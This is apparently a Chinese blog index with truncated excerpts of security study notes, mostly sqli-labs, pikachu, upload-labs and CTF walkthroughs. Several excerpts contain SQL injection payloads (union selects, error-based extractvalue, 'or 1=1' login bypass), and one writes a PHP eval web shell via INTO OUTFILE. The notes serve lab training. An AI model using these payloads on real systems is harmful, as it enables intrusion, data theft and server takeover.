原创 上傳漏洞 upload-labs

簡介 GitHub地址:https://github.com/Tj1ngwe1/upload-labs pass-1 前端js驗證 前端js過濾文件後綴名,頁面禁用js即可 pass-2 後端MIME驗證 Content-

原创 0day堆(2)堆的調試實驗

堆的調試實驗 調試態堆管理策略和常態堆管理策略:前者只使用空表不用塊表,不真實 使用調試器加載函數會觸發前者 __asm int3 調試最真實的棧 未啓用塊表的堆區信息 堆區起始位置(假設爲0x00520000

原创 xss(跨站腳本攻擊)詳解

文章目錄1. xss簡介1.1 概念1.2 成因常見場景1.3分類2.xss攻擊2.1 利用方式2.2 較高級的利用姿勢2.2.1 CSRF+XSS組合拳2.2.2 Hacking JSONJSON概述跨域JSON注入JSON H

原创 [wp]xctf newscenter

手工注入 查詢所有數據庫名稱和表名 ’ union select 1,table_schema,table_name from information_schema.tables# 發現就兩個數據庫information_sc

原创 常見動態反調試技術總結

動態反調試 本文介紹了幾種常見的動態反調試技術,在閱讀之前您可能要了解一些靜態反調試手段. 前文 : 常見靜態反調試技術總結 本文實例所用資源 : https://download.csdn.net/download/weixi

原创 ISO及安全業務,機制

ISO 應用層 爲應用軟件提供接口,使應用程序能夠使用網絡服務。 各種應用程序協議如HTTP(Web),Telnet(遠程控制),FTP(文本傳輸) 表示層 數據的交換格式、數據加密解密、數據的壓縮解壓縮 數據編碼的處理

原创 python-trade

https://tool.lu/pyc/在線反編譯pyc import base64 correct = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt' flag = base64.b64decode(corre

原创 sqlliab7-8

less-7 https://www.jianshu.com/p/20d1282e6e1d ?id=0’)) union select 1,‘2’,’<?php @eval($_POST["cmd"]);?>’ into outf

原创 JavaScript學習筆記(1)字符串方法

字符串方法 length 屬性返回字符串的長度 var txt = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; var sln = txt.length; indexOf() 方法返回字符串中指定文本首次出

原创 sqli lab 1-4

less-1 爆庫 id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata –+# 爆表 ?i

原创 sql注入 pikachu

閉合條件的探測 數字型注入 burp抓包 分別測試 id=1 and 1=1和id=1 or 1=1 存在漏洞 字符型注入 ’ 報錯 探測閉合條件 ’ order by 1# 未報錯.構成閉合 同上有兩處查詢信息 搜索型

原创 sqli lab less-5-6

less-5 基於報錯的注入 基於報錯可以爆出當前數據庫名等等 id=2’ and extractvalue(1, concat(0x7c,(select user())));-- # ?id=2’ and extra

原创 sqlilab less15-17

less15 試了很多符號,頁面根本不顯示別的信息,猜測爲盲注 可是怎麼檢測閉合? 萬能密碼登錄 最終試出來’閉合 uname=1’ or 1=1 # 接下來就要工具跑 less16 同上用萬能密碼試閉合,工具/腳本跑 les

原创 sqlilabs less18-22 HTTP頭的注入

less18 user-agent的注入 源碼分析: check_input對name,password進行了過濾 function check_input($value) { if(!empty($value)) {

原创 sqlilab11-14

less11 抓包 ’ " 實驗發現’構成閉合,存在注入點 less-12 a,b都有注入點,b比較好判斷閉合 less13 less14